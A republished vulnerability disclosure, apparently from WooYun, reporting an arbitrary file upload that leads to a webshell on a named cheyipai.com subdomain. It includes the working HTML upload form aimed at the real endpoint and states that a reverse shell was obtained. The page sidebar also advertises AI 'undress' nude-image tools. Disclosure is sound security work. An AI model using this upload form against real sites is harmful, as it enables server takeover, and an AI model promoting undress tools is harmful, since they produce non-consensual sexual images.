车易拍某站Getshell_html/css_WEB-ITnose
| 漏洞标题 | 车易拍某站Getshell |
|---|---|
| 相关厂商 | cheyipai.com |
| 漏洞作者 | 荒废的腰子 |
| 提交时间 | 2016-03-28 11:03 |
| 公开时间 | 2016-04-02 11:10 |
| 漏洞类型 | 文件上传导致任意代码执行 |
| 危害等级 | 高 |
| 自评Rank | 15 |
| 漏洞状态 | 漏洞已经通知厂商但是厂商忽略漏洞 |
| Tags标签 | getshell, 任意文件上传 |
漏洞详情
存在可以上传文件的地方
http://imo.cheyipai.com/file/NDisk/write.php
<!DOCTYPE html><html> <body> <form action="http://imo.cheyipai.com/file/NDisk/write.php" method="post" enctype ="multipart/form-data"> <input name="name" type="file" /> <input name="filename" type="hidden" value="1.php"/> <input name="cid" type="hidden"value="/"/> <input type="submit" name="Submit" value="Go"/></form> </body></html>
上传一句话木马
成功反弹shell
漏洞证明:
存在可以上传文件的地方
http://imo.cheyipai.com/file/NDisk/write.php
<!DOCTYPE html><html> <body> <form action="http://imo.cheyipai.com/file/NDisk/write.php" method="post" enctype ="multipart/form-data"> <input name="name" type="file" /> <input name="filename" type="hidden" value="1.php"/> <input name="cid" type="hidden"value="/"/> <input type="submit" name="Submit" value="Go"/></form> </body></html>
上传一句话木马
成功反弹shell
修复方案:
升级
版权声明:转载请注明来源 荒废的腰子@ 乌云
【本文版权归安全脉搏所有,未经许可不得转载。文章仅代表作者看法,如有不同观点,欢迎添加安全脉搏微信号:SecPulse,进行交流。】
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
AI Hentai Generator
Generate AI Hentai for free.
Hot Article
Hot Tools
Notepad++7.3.1
Easy-to-use and free code editor
SublimeText3 Chinese version
Chinese version, very easy to use
Zend Studio 13.0.1
Powerful PHP integrated development environment
Dreamweaver CS6
Visual web development tools
SublimeText3 Mac version
God-level code editing software (SublimeText3)
Hot Topics
What is the purpose of the <datalist> element?
Mar 21, 2025 pm 12:33 PM
The article discusses the HTML <datalist> element, which enhances forms by providing autocomplete suggestions, improving user experience and reducing errors.Character count: 159
How do I use HTML5 form validation attributes to validate user input?
Mar 17, 2025 pm 12:27 PM
The article discusses using HTML5 form validation attributes like required, pattern, min, max, and length limits to validate user input directly in the browser.
What is the purpose of the <iframe> tag? What are the security considerations when using it?
Mar 20, 2025 pm 06:05 PM
The article discusses the <iframe> tag's purpose in embedding external content into webpages, its common uses, security risks, and alternatives like object tags and APIs.
What is the purpose of the <progress> element?
Mar 21, 2025 pm 12:34 PM
The article discusses the HTML <progress> element, its purpose, styling, and differences from the <meter> element. The main focus is on using <progress> for task completion and <meter> for stati
What is the purpose of the <meter> element?
Mar 21, 2025 pm 12:35 PM
The article discusses the HTML <meter> element, used for displaying scalar or fractional values within a range, and its common applications in web development. It differentiates <meter> from <progress> and ex
What are the best practices for cross-browser compatibility in HTML5?
Mar 17, 2025 pm 12:20 PM
Article discusses best practices for ensuring HTML5 cross-browser compatibility, focusing on feature detection, progressive enhancement, and testing methods.
What is the viewport meta tag? Why is it important for responsive design?
Mar 20, 2025 pm 05:56 PM
The article discusses the viewport meta tag, essential for responsive web design on mobile devices. It explains how proper use ensures optimal content scaling and user interaction, while misuse can lead to design and accessibility issues.
How do I use the HTML5 <time> element to represent dates and times semantically?
Mar 12, 2025 pm 04:05 PM
This article explains the HTML5 <time> element for semantic date/time representation. It emphasizes the importance of the datetime attribute for machine readability (ISO 8601 format) alongside human-readable text, boosting accessibilit
